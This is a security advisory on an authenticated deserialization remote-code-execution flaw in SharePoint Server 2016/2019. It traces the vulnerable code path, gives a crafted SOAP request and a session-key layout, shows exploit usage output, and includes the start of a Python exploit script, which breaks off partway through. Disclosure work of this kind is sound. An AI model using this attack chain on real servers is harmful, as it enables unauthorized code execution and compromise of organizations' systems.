Microsoft SharePoint代码执行漏洞

# SSD Advisory - Microsoft SharePoint Server WizardConnectToDataStep4 Deserialization Of Untrusted Data RCE July 19, 2022 [SSD Disclosure / Technical Lead](https://ssd- disclosure.com/author/noamr/ "Posts by SSD Disclosure / Technical Lead") [Uncategorized](https://ssd-disclosure.com/category/uncategorized/) **TL;DR** A vulnerability in SharePoint Server allows authenticated attackers that are able to create a Site on the server to cause it to execute arbitrary code. **Vulnerability Summary** A vulnerability allows remote attackers to execute arbitrary code on affected installations of SharePoint Server 2016 and 2019. Authentication is required to exploit this vulnerability. The specific flaw exists within the `WizardConnectToDataStep4` class of the `Microsoft.Office.Server.Chart` assembly. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker with access to low-privilege credentials can leverage this vulnerability to execute code in the context of Administrator. ****Credit**** An independent security researcher, Alex Birnberg of Zymo Security, has reported this to the SSD Secure Disclosure program. **Affected Versions** * SharePoint Server 2019 Enterprise May22SU * SharePoint Server 2016 Enterprise May22SU **Vendor Response** The vulnerability has been patched during the June update of SharePoint. **Vulnerability Analysis** ### 1\. Deserializing Data From The Session State The entry point to this vulnerability may be found in the `LoadFromModel` method withing the `Microsoft.Office.Server.Internal.Charting.UI.WizardConnectToDataStep4` class of the `Microsoft.Office.Server.Chart` assembly. This method will be called when the `WizardConnectToDataPage` is being pre-rendered. public class WizardConnectToDataStep4 : WizardStepControl { private WizardConnectToDataPage WizardPage { get { return (WizardConnectToDataPage)this.Page; } } public override void LoadFromModel() { this.ctlChartBinding.LoadUI(); // 1 this.litHeader.Visible = !this.WizardPage.chartAlreadyHasBindingInfoFlag; this.litHeaderJump.Visible = this.WizardPage.chartAlreadyHasBindingInfoFlag; } The control uses [ _1_ ] the `Microsoft.Office.Server.Internal.Charting.UI.WebControls.Binding` class to perform data-binding. Taking a further look at the code of the `Binding` class reveals that if the binding data source is set to another web part, the `TryLoad` method of `Microsoft.Office.Server.WebControls.ChartWebPartDataStorage` class is called [ _4_ ] with the key obtained [ _2_ ] from the `dumpcsk` attacker controlled parameter. private string dumpCustomSessionKey { get { return base.Request["dumpcsk"]; // 2 } } private void LoadLinkedData() { if (this.DataBindingPage.ChartDataBinding.DataSource is DataSourceWebPartTable) // 3 { if (!string.IsNullOrEmpty(this.dumpCustomSessionKey)) { ChartWebPartDataStorage.TryLoad(this.dumpCustomSessionKey, ChartDataBindingHelper.GetCurrentUserCredentials(), out this.linkedData); // 4 } if (this.linkedData == null) { The `TryLoad` method use the `stateKey` parameter to obtain [ _5_ ] the buffer value which will later be deserialized [ _6_ ] using the `BinaryFormatter` serializer in an unsafe manner. ``` public static bool TryLoad(string stateKey, string userIdentity, out DataSet dataSet) { bool result = false; byte[] buffer = CustomSessionState.FetchBinaryData(stateKey); // 5 DataSetSessionBlock dataSetSessionBlock = null; using (MemoryStream memoryStream = new MemoryStream(buffer)) { IFormatter formatter = new BinaryFormatter(); dataSetSessionBlock = (DataSetSessionBlock)formatter.Deserialize(memoryStream); // 6 } if (string.Compare(dataSetSessionBlock.UserIdentity, userIdentity, StringComparison.CurrentCulture) == 0) { result = true; } dataSet = dataSetSessionBlock.Data; return result; } ``` Thus if it is possible to store arbitrary data with a known key in the session state, it would be possible to obtain remote code execution on the target server. The code path may be triggered by connecting a data source to a `ChartWebPart`. The `ChartWebPart` was removed starting from SharePoint Server 2013 navigable web parts in the page editor however the code is still available, thus we may be able to create the web part by importing the chartwebpart.xml file. Additionally, a micro feed web part is added to the page, as it will be used in the next step as the data source. By clicking the "Data & Appearance" link and then following the "Connect Chart To Data" link the `ConnectChartToData` wizard will guide the user through the connecting process. Selecting the `Connect to another Web Part` option then using the micro feed web part added earlier will lead to triggering the code path. ### 2\. Writing Arbitrary Data To The Session State Taking a further look at the `FetchBinaryData` method of the `Microsoft.Office.Server.Internal.Charting.Utilities.CustomSessionState` class shows that the `PeekState` method within the `Microsoft.Office.Server.Administration.StateManager` class of the `Microsoft.Office.Server` assembly is internally used [ _1_ ] to retrieve the data. ``` public static byte[] FetchBinaryData(string key) { StateKey key2 = StateKey.ParseKey(key); return StateManager.Current.PeekState(key2); // 1 } ``` The `PeekState` method uses [ _2_ ] the `GetItemBytes` method of the `Microsoft.Office.Server.Administration.StateSqlSession` class to retrieve the data. ``` internal byte[] PeekState(StateKey key) { // ... bool flag; TimeSpan timeSpan; int num; byte[] itemBytes = StateSqlSession.GetItemBytes(key, false, out flag, out timeSpan, out num); // 2 // ... return itemBytes; } ``` Taking a further look at the `GetItemBytes` method shows that the data is retrieved [ _3_ ] via the `proc_GetItemWithoutLock` stored procedure from the local SQL server. ``` internal static byte[] GetItemBytes(StateKey key, bool obtainLock, out bool locked, out TimeSpan lockAgeInSeconds, out int lockId) { StateSqlSession.ValidateKey(key); byte[] itemBytesInternal; try { using (StateSqlSession stateSqlSession = new StateSqlSession(key.Database)) { using (SqlCommand sqlCommand = new SqlCommand(obtainLock ? "proc_GetItemWithLock" : "proc_GetItemWithoutLock", stateSqlSession.Connection)) // 3 { sqlCommand.CommandType = CommandType.StoredProcedure; sqlCommand.Parameters.Add(new SqlParameter("@id", SqlDbType.NVarChar, 512)); SqlParameter sqlParameter = sqlCommand.Parameters.Add(new SqlParameter("@item", SqlDbType.VarBinary, -1)); sqlParameter.Direction = ParameterDirection.Output; sqlParameter = sqlCommand.Parameters.Add(new SqlParameter("@locked", SqlDbType.Bit)); sqlParameter.Direction = ParameterDirection.Output; sqlParameter = sqlCommand.Parameters.Add(new SqlParameter("@lockAgeInSeconds", SqlDbType.Int)); sqlParameter.Direction = ParameterDirection.Output; sqlParameter = sqlCommand.Parameters.Add(new SqlParameter("@lockCookie", SqlDbType.Int)); sqlParameter.Direction = ParameterDirection.Output; itemBytesInternal = StateSqlSession.GetItemBytesInternal(key, sqlCommand, out locked, out lockAgeInSeconds, out lockId); } } } // ... } ``` Observing the `proc_GetItemWithoutLock` stored procedure reveals that the `[dbo].Sessions` table is used to retrive the data. CREATE PROCEDURE [dbo].[proc_GetItemWithoutLock] @id varchar(512), @item varbinary(max) OUTPUT, @locked bit OUTPUT, @lockAgeInSeconds int OUTPUT, @lockCookie int OUTPUT AS DECLARE @utcnow AS datetime SET @utcnow = GETUTCDATE() UPDATE [dbo].Sessions SET ExpireTimeUtc = DATEADD(minute, TimeoutMinutes, @utcnow), @locked = Locked, @lockAgeInSeconds = DATEDIFF(second, LockTimeUtc, @utcnow), @lockCookie = LockCookie, @item = CASE @locked WHEN 0 THEN ItemData ELSE NULL END WHERE ItemId = @id RETURN 0 For reference, a sample of the `[dbo].Sessions` table may look similar to the following image:  There are two stored procedures, `proc_AddItem` [ _4_ ] and `proc_UpdateItem` [ _5_ ], that are tasked with modifying the entries in the `[dbo].Sessions` table. Tracking the use of the stored procedures leads to the same method `SetAndReleaseItemBytesExclusive` within the `Microsoft.Office.Server.Administration.StateSqlSession` class. ``` internal static void SetAndReleaseItemBytesExclusive(StateKey key, byte[] buf, int timeout, int lockId, bool newItem) { int num = buf.Length; StateSqlSession.ValidateKey(key); try { using (StateSqlSession stateSqlSession = new StateSqlSession(key.Database)) { SqlCommand sqlCommand = null; try { if (newItem) { sqlCommand = new SqlCommand("proc_AddItem", stateSqlSession.Connection); // 4 sqlCommand.CommandType = CommandType.StoredProcedure; sqlCommand.Parameters.Add(new SqlParameter("@id", SqlDbType.NVarChar, 512)); sqlCommand.Parameters.Add(new SqlParameter("@item", SqlDbType.VarBinary, -1)); sqlCommand.Parameters.Add(new SqlParameter("@timeout", SqlDbType.Int)); } else { sqlCommand = new SqlCommand("proc_UpdateItem", stateSqlSession.Connection); // 5 sqlCommand.CommandType = CommandType.StoredProcedure; sqlCommand.Parameters.Add(new SqlParameter("@id", SqlDbType.NVarChar, 512)); sqlCommand.Parameters.Add(new SqlParameter("@item", SqlDbType.VarBinary, -1)); sqlCommand.Parameters.Add(new SqlParameter("@timeout", SqlDbType.Int)); sqlCommand.Parameters.Add(new SqlParameter("@lockCookie", SqlDbType.Int)); } // ... ``` The stored procedure that will be used is dependent on the value of the `newItem` parameter, and thus for a new row to be created the value of this parameter should be `true`. ``` internal void CreateState(StateKey key, byte[] state, int timeout) { // ... StateSqlSession.SetAndReleaseItemBytesExclusive(key, state, timeout, 0, true); // 6 ``` The `SetAndReleaseItemBytesExclusive` with the `newItem` parameter set to `true` is only used [ _6_ ] by the `CreateState` method, within the `Microsoft.Office.Server.Administration.StateManager` class of the `Microsoft.Office.Server` assembly. ``` private static void SetChildStateFromMainProcess(Document doc, string key, byte[] bytes) { StateKey stateKeyInternal = DocumentChildState.GetStateKeyInternal(doc, key); if (stateKeyInternal == null) { StateManager.GetManager(HttpContext.Current).CreateState(DocumentChildState.EnsureStateKeyInternal(doc, key, bytes.Length), bytes, FormsService.GetLocal().ActiveSessionsTimeout); // 7 return; } StateManager.GetManager(HttpContext.Current).UpdateState(stateKeyInternal, bytes, DocumentSessionStateManager.SessionStateTimeout); DocumentChildState.StateInfo stateInfo = doc.ChildStateKeys[key]; doc.ChildStateKeys[key] = new DocumentChildState.StateInfo(stateInfo.SerializedKey, bytes.Length, stateInfo.Version + 1); } ``` One of the places where the `CreateState` method is used [ _7_ ] is by the `SetChildStateFromMainProcess` method, within the `Microsoft.Office.InfoPath.Server.DocumentLifetime.DocumentChildState` class of the `Microsoft.Office.InfoPath.Server` assembly. When the `CreateState` method is used, a randomly generated state key is generated for use. ``` public static void SetChildState(Document doc, string key, byte[] bytes) { if (PartialTrustExecutorHelper.IsPartialTrustAppDomain) { DocumentChildState.SetChildStateFromPTCProcess(key, bytes); return; } DocumentChildState.SetChildStateFromMainProcess(doc, key, bytes); // 8 } ``` The `SetChildStateFromMainProcess` method is called by the `SetChildState` method. ``` private static bool UpdateMetadataAndAddToSessionState(Document document, HttpPostedFile file, XPathNavigator newNode) { string fileName = file.FileName; string fileName2 = Path.GetFileName(fileName); byte[] array = null; using (Stream inputStream = file.InputStream) { array = new byte[inputStream.Length]; inputStream.Read(array, 0, (int)inputStream.Length); } if (array != null) { string text = EventSharePointFileAttachmentAdd.GenerateSessionStateKey(fileName2); IInfoPathNodeMetadata infoPathNodeMetadata = newNode as IInfoPathNodeMetadata; InfoPathNodeMetadata infoPathNodeMetadata2 = (infoPathNodeMetadata == null) ? null : infoPathNodeMetadata.Metadata; if (infoPathNodeMetadata2 != null) { infoPathNodeMetadata2.SPFileAttachmentIsServerUrl = false; infoPathNodeMetadata2.SPFileAttachmentSessionStateKey = text; DocumentChildState.SetChildState(document, text, array); // 9 } return true; } return false; } ``` The `SetChildMethod` is called [ _9_ ] with the data to store obtained from the `file` parameter by the `UpdateMetadataAndAddToSessionState` method within the `EventSharePointFileAttachmentAdd.Microsoft.Office.InfoPath.Server.DocumentLifetime` class. The `EventSharePointFileAttachmentAdd` event is responsible for responding to attachment events. Such an event may be triggered by attaching a file to an item as demonstrated later. ``` private void SetAttachment(Document document, BindingServices bindingServices, HttpPostedFile file) { SnippetElement snippetElementById = bindingServices.GetSnippetElementById(this._controlId); if (snippetElementById != null && snippetElementById.BaseControl is SharePointFileAttachmentCollection) { // ... xpathNavigator.AppendChildElement(prefix, localName, parentXPath.NamespaceManager.LookupNamespace(prefix), fileName); XPathNavigator xpathNavigator2 = xpathNavigator.SelectSingleNode("node()[last()]"); if (!EventSharePointFileAttachmentAdd.UpdateMetadataAndAddToSessionState(document, file, xpathNavigator2)) // 10 { xpathNavigator2.DeleteSelf(); } } } ``` The `UpdateMetadataAndAddToSessionState` method is called by the `SetAttachment` method with the `file` parameter that will be used to store the data in the session state. ``` internal override void Play(Document document, BindingServices bindingServices, EventLogProcessor eventLogProcessor) { if (HttpContext.Current == null || HttpContext.Current.Request == null) { return; } HttpRequest request = HttpContext.Current.Request; if (request.Files == null || request.Files.Count == 0) { document.UserMessages.AddAlert(InfoPathResourceManager.GetString(InfoPathResourceManager.Ids.FileAttachmentAttachingError)); return; } HttpPostedFile httpPostedFile = request.Files["FileAttachmentUpload"]; // 11 if (httpPostedFile == null || httpPostedFile.ContentLength <= 0) { document.UserMessages.AddAlert(InfoPathResourceManager.GetString(InfoPathResourceManager.Ids.FileAttachmentUploadFileMissingOrZeroByteError)); return; } if (EventFileAttachment.ValidateUploadedFile(httpPostedFile.FileName, document)) { if (!EventSharePointFileAttachmentAdd.ValidateFileSize(httpPostedFile)) { document.UserMessages.AddAlert(InfoPathResourceManager.GetString(InfoPathResourceManager.Ids.FileAttachmentUploadFileSizeError)); return; } this.SetAttachment(document, bindingServices, httpPostedFile); // 12 } } ``` As it can be seen above the `SetAttachment` method is called [ _12_ ] by the `Play` method which is called whenever this even is triggered. The `httpPostedFile` parameter that will be used to create a new entry in the session state originates from the `FileAttachmentUpload` request parameter, and is attacker controlled, thus permitting arbitrary data to be stored in the session state. The attachment is supposed to be done to an item of an InfoPath list, and not a regular SharePoint list. By intercepting the traffic of the `InfoPath Designer 2013` tool, it has been discovered that issuing a `POST` request to the `/_vti_bin/FormsServices.asmx` API endpoint may be used to associate an InfoPath solution to any list, thus permitting the attacker to create an InfoPath list. POST /sites/nuWzhv/_vti_bin/FormsServices.asmx HTTP/1.1 Host: win-v1199bktm6s Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 SOAPAction: "http://schemas.microsoft.com/office/infopath/2007/formsServices/SetFormsForListItem" Content-Type: text/xml; charset=utf-8 Content-Length: 83725 Connection: Keep-Alive <?xml version="1.0" encoding="UTF-8" standalone="no"?> <SOAP-ENV:Envelope xmlns:SOAPSDK1="http://www.w3.org/2001/XMLSchema" xmlns:SOAPSDK2="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAPSDK3="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Body> <SetFormsForListItem xmlns='http://schemas.microsoft.com/office/infopath/2007/formsServices'> <lcid>1033</lcid> <base64FormTemplate>BASE64_SOLUTION_XSN</base64FormTemplate> <applicationId>InfoPath 100</applicationId> <listGuid>LIST_ID</listGuid> <contentTypeId>CONTENT_TYPE_ID</contentTypeId> </SetFormsForListItem> </SOAP-ENV:Body> </SOAP-ENV:Envelope> The request and solution manifest require that `SITE_URL`, `LIST_ID`, and `CONTENT_TYPE_ID` are replaced with the appropiate information, and the solution is repackaged. ### 3\. Leaking The State Key of The Data The serialized key of the list may be obtained by scraping the HTML code of the "Add Item" page. The state key of the data may be obtained by issuing a GET request to the `/_layouts/15/FormServerAttachments.aspx` path. The request will be handled by the `FileDownload` method, within the `Microsoft.Office.InfoPath.Server.Controls.FormServerAttachments`, of the `Microsoft.Office.InfoPath.Server` assembly. ``` private static bool FileDownload(HttpContext context) { string text = context.Request.QueryString["fid"]; string text2 = context.Request.QueryString["sid"]; string value = context.Request.QueryString["key"]; string strA = context.Request.QueryString["dl"]; int num = 0; string empty = string.Empty; if (string.IsNullOrEmpty(text) || string.IsNullOrEmpty(text2) || string.IsNullOrEmpty(value) || (string.Compare(strA, "fa", StringComparison.OrdinalIgnoreCase) != 0 && string.Compare(strA, "ip", StringComparison.OrdinalIgnoreCase) != 0)) { // ... if (Canary.VerifyCanaryFromCookie(context, spsite, solutionById)) { // ... using (BinaryWriter binaryWriter = new BinaryWriter(context.Response.OutputStream)) { Base64DataStorage.Base64DataItem item = null; StreamUtils.DeserializeObjectsFromString(value, delegate(EnhancedBinaryReader binaryReader) { item = new Base64DataStorage.Base64DataItem(binaryReader); DocumentChildState.StateInfo stateInfo = new DocumentChildState.StateInfo(); ((IBinaryDeserializable)stateInfo).Deserialize(binaryReader); StateKey stateKey = StateKey.ParseKey(stateInfo.SerializedKey); item.EnsureData(stateKey); // 1 }); byte[] dataAsBytes = item.GetDataAsBytes(); using (Stream stream = new MemoryStream(dataAsBytes, false)) { if (string.Compare(strA, "fa", StringComparison.OrdinalIgnoreCase) != 0) { context.Response.AppendHeader("Content-Disposition", "attachment;filename=\"image\""); context.Response.AppendHeader("X-Download-Options", "noopen"); context.Response.ContentType = ImageUtils.GetContentType(dataAsBytes); return InlinePicture.ReadInfoFromStream(binaryWriter, stream); } context.Response.ContentType = "application/octet-stream"; if (FileAttachment.ReadInfoFromStream(binaryWriter, out num, out empty, stream)) { FilePathUtils.AddFileDownloadHttpHeader(context, empty); return true; } return false; } } } // ... ``` The `FileDownload` method requires 4 query parameters, `fid` which may be set to any string, `sid` which has to be the canary key sent in the request, the `key` which has to be crafted as detailed below, and `dl` which has to be set to `ip`. The `sid` parameter value may be obtained from the `Cookie` header by splitting the `_InfoPath_CanaryValue` and obtaining the `sid` parameter. ``` Cookie: WSS_FullScreenMode=false; splnu=0; _InfoPath_Sentinel=1; _InfoPath_CanaryValueAENL2LSY5RS3QRMYVLOCA4WWYRNTAL3TNF2GK4ZPOB3W4ZDTNF2GKL2MNFZXI4ZPKB3W4ZCMNFZXIL2JORSW2L3UMVWXA3DBORSS46DTNYTDGSRSGVYTOUJVHBEVCR2CINUWOTSWOB2XQVSYLFTFMWCUN5NGIS3RMJ3XSSSJA=ZTK5c65VTBENNiVx6tsWFhqE+zRhWHrecNeXhXaD4cqrO5drivCeFA0/nvDcRbGu/vp2/lOfDb4+XVKX0VuNyA==|637883089585344020 ``` In the case above the `sid` value would be `AENL2LSY5RS3QRMYVLOCA4WWYRNTAL3TNF2GK4ZPOB3W4ZDTNF2GKL2MNFZXI4ZPKB3W4ZCMNFZXIL2JORSW2L3UMVWXA3DBORSS46DTNYTDGSRSGVYTOUJVHBEVCR2CINUWOTSWOB2XQVSYLFTFMWCUN5NGIS3RMJ3XSSSJA`. ``` | Name | Size (in bytes) | Value | | - | - | - | | state | 1 | 4 (DelayLoad) | | sessionDataType | 1 | 2 (ByteArray) | | len_item_id | 1 | 36 | | item_id | 36 | db2c0d12-0b12-456b-8137-bb9a42602686 (Any GUID works) | | len_state_key | 1 | 65 | | state_key | 65 | The key scraped from the HTML code | | size | 1 | 0 (Or any other number) | | version | 1 | 0 (Or any other number) | ``` The `EnsureData` method is called by the `FileDownload` method, and when the `State` is set to `DelayLoad` the desired state entry is retrieved from the SQL database. ``` internal void EnsureData(StateKey stateKey) { if (this.State == Base64ItemState.DelayLoad) { byte[] sessionData = StateManager.GetManager(HttpContext.Current).PeekState(stateKey); this.SetSessionData(sessionData); return; } if (this.State == Base64ItemState.Removed) { throw new InfoPathLocalizedException(InfoPathResourceManager.Ids.ServerGenericError, new string[0]); } } ``` ## Exploit The exploit provided requires four arguments, `url` being the target's URL, `username` being the username of the low-privilege user, `password` being the password of the low-privilege user, and `command` being the desired command to execute. ```shell python exploit.py --url http://win-v1199bktm6s --user user --password p4ssw0rd. --command calc [*] Creating site [*] Creating custom list [*] Associating custom list with infopath [*] Uploading payload [*] Uploading page [*] Executing command [*] Cleaning up [#] Exploit succeeded ``` **Code** ```python #!/usr/bin/env python3 import re import json import time import struct import base64 import random import string import argparse import textwrap import requests import subprocess import cabarchive from bs4 import BeautifulSoup import xml.etree.ElementTree as ET from requests_ntlm2 import HttpNtlmAuth PAGE = '''\ <%@ Register TagPrefix="WpNs0" Namespace="Microsoft.Office.Server.WebControls" Assembly="Microsoft.Office.Server.Chart, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c"%> <%@ Assembly Name="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c"%> <%@ Page Language="C#" Inherits="Microsoft.SharePoint.WebPartPages.WikiEditPage" MasterPageFile="~masterurl/default.master" MainContentID="PlaceHolderMain" meta:progid="SharePoint.WebPartPage.Document" meta:webpartpageexpansion="full" %> <%@ Import Namespace="Microsoft.SharePoint.WebPartPages" %> <%@ Register Tagprefix="SharePoint" Namespace="Microsoft.SharePoint.WebControls" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <%@ Register Tagprefix="Utilities" Namespace="Microsoft.SharePoint.Utilities" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <%@ Import Namespace="Microsoft.SharePoint" %> <%@ Assembly Name="Microsoft.Web.CommandUI, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <%@ Register Tagprefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPages" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <asp:Content ContentPlaceHolderId="PlaceHolderPageTitle" runat="server"> <SharePoint:ProjectProperty Property="Title" runat="server"/> - <SharePoint:ListItemProperty runat="server"/> </asp:Content> <asp:Content ContentPlaceHolderId="PlaceHolderPageImage" runat="server"> <SharePoint:AlphaImage ID=onetidtpweb1 Src="/_layouts/15/images/wiki.png?rev=43" Width=145 Height=54 Alt="" Runat="server"/></asp:Content> <asp:Content ContentPlaceHolderId="PlaceHolderAdditionalPageHead" runat="server"> <meta name="CollaborationServer" content="SharePoint Team Web Site" /> <SharePoint:ScriptBlock runat="server"> var navBarHelpOverrideKey = "WSSEndUser"; </SharePoint:ScriptBlock> <SharePoint:RssLink runat="server"/> </asp:Content> <asp:Content ContentPlaceHolderId="PlaceHolderMiniConsole" runat="server"> <SharePoint:FormComponent TemplateName="WikiMiniConsole" ControlMode="Display" runat="server" id="WikiMiniConsole"/> </asp:Content> <asp:Content ContentPlaceHolderId="PlaceHolderLeftActions" runat="server"> <SharePoint:RecentChangesMenu runat="server" id="RecentChanges"/> </asp:Content> <asp:Content ContentPlaceHolderId="PlaceHolderMain" runat="server"> <span id="wikiPageNameDisplay" style="display: none;" runat="server"> <SharePoint:ListItemProperty runat="server"/> </span> <span style="display:none;" id="wikiPageNameEdit" runat="server"> <asp:TextBox id="wikiPageNameEditTextBox" runat="server"/> </span> <SharePoint:VersionedPlaceHolder UIVersion="4" runat="server"> <SharePoint:SPRibbonButton id="btnWikiEdit" RibbonCommand="Ribbon.WikiPageTab.EditAndCheckout.SaveEdit.Menu.SaveEdit.Edit" runat="server" Text="edit"/> <SharePoint:SPRibbonButton id="btnWikiSave" RibbonCommand="Ribbon.WikiPageTab.EditAndCheckout.SaveEdit.Menu.SaveEdit.SaveAndStop" runat="server" Text="edit"/> <SharePoint:SPRibbonButton id="btnWikiRevert" RibbonCommand="Ribbon.WikiPageTab.EditAndCheckout.SaveEdit.Menu.SaveEdit.Revert" runat="server" Text="Revert"/> </SharePoint:VersionedPlaceHolder> <SharePoint:EmbeddedFormField id="WikiField" FieldName="WikiField" ControlMode="Display" runat="server"><div><div><table id="layoutsTable" style="width&#58;100%;"><tbody><tr style="vertical-align&#58;top;"><td style="width&#58;100%;"><div class="ms-rte-layoutszone-outer" style="width&#58;100%;"><div class="ms-rte-layoutszone-inner"> <WebPartPages:XsltListViewWebPart runat="server" ViewFlag="" ViewSelectorFetchAsync="False" InplaceSearchEnabled="False" ServerRender="False" ClientRender="False" InitialAsyncDataFetch="False" WebId="00000000-0000-0000-0000-000000000000" IsClientRender="False" GhostedXslLink="main.xsl" EnableOriginalValue="False" ViewContentTypeId="0x" PageSize="-1" UseSQLDataSourcePaging="True" DataSourceID="" ShowWithSampleData="False" AsyncRefresh="False" ManualRefresh="False" AutoRefresh="False" AutoRefreshInterval="60" Title="MicroFeed" FrameType="Default" SuppressWebPartChrome="False" Description="MySite MicroFeed Persistent Storage List" IsIncluded="True" PartOrder="1" FrameState="Normal" AllowRemove="True" AllowZoneChange="True" AllowMinimize="True" AllowConnect="True" AllowEdit="True" AllowHide="True" IsVisible="True" CatalogIconImageUrl="/_layouts/15/images/itgen.png?rev=43" TitleUrl="SITE_PATH/Lists/PublishedFeed" DetailLink="SITE_PATH/Lists/PublishedFeed" HelpLink="" HelpMode="Modeless" Dir="Default" PartImageSmall="" MissingAssembly="Cannot import this Web Part." PartImageLarge="/_layouts/15/images/itgen.png?rev=43" IsIncludedFilter="" ExportControlledProperties="False" ConnectionID="00000000-0000-0000-0000-000000000000" ID="g_33333333_3333_3333_3333_333333333334" ExportMode="NonSensitiveData" __MarkupType="vsattributemarkup" __AllowXSLTEditing="true" __designer:CustomXsl="fldtypes_Ratings.xsl" WebPart="true" Height="" Width=""><ParameterBindings> <ParameterBinding Name="dvt_sortdir" Location="Postback;Connection"/> <ParameterBinding Name="dvt_sortfield" Location="Postback;Connection"/> <ParameterBinding Name="dvt_startposition" Location="Postback" DefaultValue=""/> <ParameterBinding Name="dvt_firstrow" Location="Postback;Connection"/> <ParameterBinding Name="OpenMenuKeyAccessible" Location="Resource(wss,OpenMenuKeyAccessible)" /> <ParameterBinding Name="open_menu" Location="Resource(wss,open_menu)" /> <ParameterBinding Name="select_deselect_all" Location="Resource(wss,select_deselect_all)" /> <ParameterBinding Name="idPresEnabled" Location="Resource(wss,idPresEnabled)" /> <ParameterBinding Name="NoAnnouncements" Location="Resource(wss,noXinviewofY_LIST)" /> <ParameterBinding Name="NoAnnouncementsHowTo" Location="Resource(core,noXinviewofY_DEFAULT)" /> <ParameterBinding Name="AddNewAnnouncement" Location="Resource(wss,addnewitem)" /> <ParameterBinding Name="MoreAnnouncements" Location="Resource(wss,moreItemsParen)" /> </ParameterBindings> <DataFields> </DataFields> <XmlDefinition> <View MobileView="TRUE" Type="HTML" Hidden="TRUE" DisplayName="" Url="SITE_PATH/SitePages/PAGE_NAME" Level="1" BaseViewID="1" ContentTypeID="0x" ImageUrl="/_layouts/images/generic.png" > <Query> <OrderBy> <FieldRef Name="Created_x0020_Date"/> </OrderBy> </Query> <ViewFields> <FieldRef Name="LinkTitleNoMenu"/> <FieldRef Name="MicroBlogType"/> <FieldRef Name="PostAuthor"/> <FieldRef Name="DefinitionId"/> <FieldRef Name="RootPostID"/> <FieldRef Name="RootPostUniqueID"/> <FieldRef Name="RootPostOwnerID"/> <FieldRef Name="UniqueId"/> <FieldRef Name="ReplyCount"/> <FieldRef Name="Created"/> <FieldRef Name="Modified"/> <FieldRef Name="Author"/> <FieldRef Name="Editor"/> <FieldRef Name="ID"/> <FieldRef Name="ReferenceID"/> <FieldRef Name="Attributes"/> <FieldRef Name="Content"/> <FieldRef Name="ContentData"/> <FieldRef Name="SearchContent"/> <FieldRef Name="RefRoot"/> <FieldRef Name="RefReply"/> <FieldRef Name="PostSource"/> <FieldRef Name="PeopleCount"/> <FieldRef Name="PeopleList"/> <FieldRef Name="MediaLinkType"/> <FieldRef Name="MediaLinkDescription"/> <FieldRef Name="MediaLinkURI"/> <FieldRef Name="MediaLinkUISnippet"/> <FieldRef Name="MediaLinkContentURI"/> <FieldRef Name="MediaLength"/> <FieldRef Name="MediaWidth"/> <FieldRef Name="MediaHeight"/> <FieldRef Name="MediaActionClickUrl"/> <FieldRef Name="MediaActionClickKind"/> <FieldRef Name="eMailSubscribers"/> <FieldRef Name="eMailUnsubscribed"/> <FieldRef Name="LikesCount"/> <FieldRef Name="LikedBy"/> </ViewFields> <RowLimit Paged="TRUE">100</RowLimit> <XslLink>main.xsl</XslLink> <Toolbar Type="None"/> </View> </XmlDefinition> </WebPartPages:XsltListViewWebPart> <WpNs0:ChartWebPart runat="server" IsCustomized="False" DesignerTemplateId="" ChartXml="&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?&gt; &lt;Chart BorderColor=&quot;26, 59, 105&quot; BorderWidth=&quot;1&quot; BorderlineDashStyle=&quot;Solid&quot;&gt; &lt;Series&gt; &lt;Series Name=&quot;Default&quot; ShadowOffset=&quot;2&quot; ChartArea=&quot;Default&quot; BorderColor=&quot;26, 59, 105&quot;&gt; &lt;/Series&gt; &lt;/Series&gt; &lt;ChartAreas&gt; &lt;ChartArea BackColor=&quot;White&quot; ShadowOffset=&quot;2&quot; BorderColor=&quot;26, 59, 105&quot; BorderDashStyle=&quot;Solid&quot; Name=&quot;Default&quot;&gt; &lt;AxisY&gt; &lt;MajorGrid LineColor=&quot;Silver&quot; /&gt; &lt;MinorGrid LineColor=&quot;Silver&quot; /&gt; &lt;/AxisY&gt; &lt;AxisX&gt; &lt;MajorGrid LineColor=&quot;Silver&quot; /&gt; &lt;MinorGrid LineColor=&quot;Silver&quot; /&gt; &lt;/AxisX&gt; &lt;AxisX2&gt; &lt;MajorGrid LineColor=&quot;Silver&quot; /&gt; &lt;MinorGrid LineColor=&quot;Silver&quot; /&gt; &lt;/AxisX2&gt; &lt;AxisY2&gt; &lt;MajorGrid LineColor=&quot;Silver&quot; /&gt; &lt;MinorGrid LineColor=&quot;Silver&quot; /&gt; &lt;/AxisY2&gt; &lt;/ChartArea&gt; &lt;/ChartAreas&gt; &lt;BorderSkin BackColor=&quot;CornflowerBlue&quot; BackSecondaryColor=&quot;CornflowerBlue&quot; /&gt; &lt;/Chart&gt;" DesignerChartTheme="BrightPastel" AlignDataPointsByAxisLabel="False" DataBindingsString="&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?&gt; &lt;ArrayOfDataBinding xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; /&gt;" ConnectionPointEnabled="True" ShowDebugInfoRuntime="False" BindToDataDesignMode="True" ShowToolbar="True" RealTimeInterval="0" Description="Helps you to visualize your data on SharePoint sites and portals." ExportMode="All" ImportErrorMessage="Cannot import Chart Web Part." Title="Chart Web Part" ID="g_33333333_3333_3333_3333_333333333333" __MarkupType="vsattributemarkup" WebPart="true" __designer:IsClosed="false"></WpNs0:ChartWebPart> <p><br></p></div></div></td></tr></tbody></table><span id="layoutsData" 